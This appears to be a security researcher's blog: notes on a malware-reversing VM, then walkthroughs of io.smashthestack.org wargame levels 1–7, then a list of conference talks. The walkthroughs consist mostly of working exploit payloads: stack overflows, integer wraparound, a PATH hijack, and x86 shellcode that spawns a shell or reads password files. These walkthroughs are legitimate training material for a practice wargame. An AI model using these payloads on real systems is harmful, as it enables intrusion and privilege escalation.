Notes: Reversing VM

Some notes to myself on rebuilding my reversing VM from scratch:

• VirtualBox
• Windows 7
• IDA Pro
• Hex-Rays
• Immunity Debugger
• Wireshark
• CFF Explorer
• Process Hacker
• Resource Hacker
• apateDNS
• Dbgview
• hexedit
• PEiD
• strings
• upx
• idr - Interactive Delphi Reconstructor
• pydbg
• pefile
• Sandbox that generates memdumps
• Practical Malware Analysis
• Grey Hat Python
• The IDA Pro Book

IO Level 7

Level 7 from io.smashthestack.org:

count is a signed integer, so a negative integer can be passed in. If a very large negative integer is passed in, the math problem in the memcpy() will cause the int to wrap around, back to positive territory. Here are some debugging printfs to help visualize how many bytes are actually being copied in the memcpy():


level7@io:/tmp/ds7$ ./level07 -1073741815 blah
count: -1073741815 (0xc0000009) 3221225481
count * sizeof(int): 36 (0x00000024) 36
Not today son

Bruteforce offsets a bit to get things to line up:

(gdb) run -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /tmp/ds7/level07 -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`

count: -1073741813 (0xc000000b) 3221225483

count * sizeof(int): 44 (0x0000002c) 44

Breakpoint 1, main (argc=3, argv=0xbffffd64) at level07.c:23

23              if(count == 0x574f4c46) {

(gdb) x/x &count

0xbffffcac:     0x42424242

Adjust offsets for production:

(gdb) run -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

Breakpoint 1, 0x08048467 in main ()

(gdb) x/x $ebp - 0xc

0xbffffc9c:     0x574f4c46

level7@io:/tmp/ds7$ /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

WIN!

sh-4.2$ id

uid=1007(level7) gid=1007(level7) euid=1008(level8) groups=1008(level8),1007(level7),1029(nosu)

sh-4.2$ cat /home/level8/.pass

shhh don't snitch

IO Level 6

Level 6 from io.smashthestack.org:

Input templates:


first: AAAAAAAAAAAAAAAAAAAA (20 + \n)
last: BBBBBBBBBBBBBBCCCCC (19 + \n)

If input is greater than 20, the strncpy() in prompt_name() will truncate the string and it won't slap on a \0.

In prompt_full_name(), after reading both prompts, first = first + last, so the first strcpy() will copy 39 bytes into full name, plus 1 space, then 19 more bytes from the second strcpy() (enough to overwrite EIP).

Note: Need to fill the first read()'s buffer completely, else the second read() will pick up where it left off, mucking things up. New input template:

perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x01\x02\x03\x04C\n"' > in

Put shellcode into EGG environment variable, shellcode was very picky (no actual shells allowed):


level6@io:/tmp/dennis6$ cat sc.pl
my $nops = "\x90" x 50;

#dennis@ipa:~/msf3$ ./msfvenom -p linux/x86/exec -f pl -b '\x00' CMD='cat /home/level7/.pass'
#[*] x86/shikata_ga_nai succeeded with size 85 (iteration=1)

my $sc =
"\xdb\xd3\xd9\x74\x24\xf4\xbb\xc6\x34\x4f\xa3\x58\x29\xc9" .
"\xb1\x0f\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\x24\xc1\x25" .
"\xa8\xf0\xb3\xe8\xc8\x68\xe9\x6f\x9c\x8f\x99\x40\xed\x27" .
"\x5a\xf7\x3e\xd5\x33\x69\xc8\xfa\x96\x9d\xdd\xfc\x16\x5e" .
"\x81\x9d\x62\x7e\x6a\x35\xe4\x13\x11\xea\x96\x8e\xaf\x91" .
"\x0a\x66\x7f\x77\xa3\xe9\x0c\xf4\x43\xbd\xa1\x73\xa2\x8c" .
"\xc6";

print $nops.$sc

level6@io:/tmp/dennis6$ export EGG=`perl sc.pl`

Get address of the EGG environment variable:

level6@io:/tmp/dennis6$ cat le.c

#include

/* progname must be the same length as /levels/level06 */

int main()

{

        char *envaddr;

        envaddr = getenv("EGG");

        printf("EGG is at %p\n", envaddr);

}

>>> len("/levels/level06")

15

>>> len("/tmp/dennis6/le")

15

level6@io:/tmp/dennis6$ ./le

EGG is at 0xbffffe97

Adjust the input template with return address:

level6@io:/tmp/dennis6$ perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x97\xfe\xff\xbfC\n"' > exp

level6@io:/tmp/dennis6$ /levels/level06 < exp

Please enter your first name:

Please enter your last name:

Welcome, AAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBB???C BBBBBBBBBBBBBB???C

shhh don't snitch

IO Level 5

Level 5 of io.smashthestack.org:


level5@io:/tmp/dennis5$ cat exp.py 
# aleph one's shellcode from smashing the stack for fun and profit
shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

nops = "A" * (140 - len(shellcode))

# start of buf, from gdb
ret = "\xe0\xfb\xff\xbf"

print "%s" % nops + shellcode + ret

level5@io:/tmp/dennis5$ /levels/level05 `python exp.py`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?^1?FF  V
                     ? N?1??@??????/bin/sh????
sh-4.1$ id            ?
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(level5),1029(nosu)
sh-4.1$ cat /home/level6/.pass

shhh don't snitch

IO Level 4

Level 4 of io.smashthestack.org:

level4@io:~$ cd /tmp/dennis
level4@io:/tmp/dennis$ cat id
#!/bin/sh
cat /home/level5/.pass
level4@io:/tmp/dennis$ export PATH=.:$PATH
level4@io:/tmp/dennis$ /levels/level04

shhh don't snitch

IO Level 3

Level 3 of io.smashthestack.org:

level3@io:/levels$ ./level03 `python -c 'print "A" * 80'`
This is exciting we're going to 0x41414141
Segmentation fault
level3@io:/levels$ ./level03 `python -c 'print "A" * 76 + "\x74\x84\x04\x08"'`
This is exciting we're going to 0x8048474
Win.
sh-4.1$ id
uid=1003(level3) gid=1003(level3) euid=1004(level4) groups=1004(level4),1003(level3),1029(nosu)
sh-4.1$ cat /home/level4/.pass

shhh don't snitch

IO Level 2

Level 2 of io.smashthestack.org:

level2@io:/levels$ ./level02_alt NAN
sh-4.1$ id    
uid=1002(level2) gid=1002(level2) euid=1003(level3) groups=1003(level3),1002(level2),1029(nosu)
sh-4.1$ cat /home/level3/.pass

shhh don't snitch

IO Level 1

Level 1 of io.smashthestack.org:

level1@io:/levels$ strings -el level01
SecretPW
level1@io:/levels$ ./level01 SecretPW
Win!

You will find the ssh password for level2 in /home/level2/.pass

sh-4.1$ cat /home/level2/.pass

shhh don't snitch

Signals #1-4

I'm putting Gera's Signals #1-4 on hold indefinitely. I gave them the ol' college try, but didn't make much progress after multiple attempts.

If anyone has anything on these, please ping me.

Up next, io.smashthestack.org. WARNING: there will be spoilers!

9-5ing

A couple of 9-5 things:

• Conference talk - ASERT's DDoS Malware Corral, Volume 1
• Volume 1 (pre-talk) at ARBSEC in Ann Arbor, Michgian
• Volume 1 at InfoSec Southwest 2013 in Austin, Texas
• Volume 1.5 at a Red Sky Alliance meeting 
• Blog post - Digging Through an "Administrative Network Stressor" Provider's Database
• Blog post - The Revolution Will Be Written in Delphi
• SecurityWeek media - Arbor Networks Goes Inside Development of BlackRev DDoS Malware
• VRT and Emerging Threats Snort sigs - Blackrev C2 sigs (thread)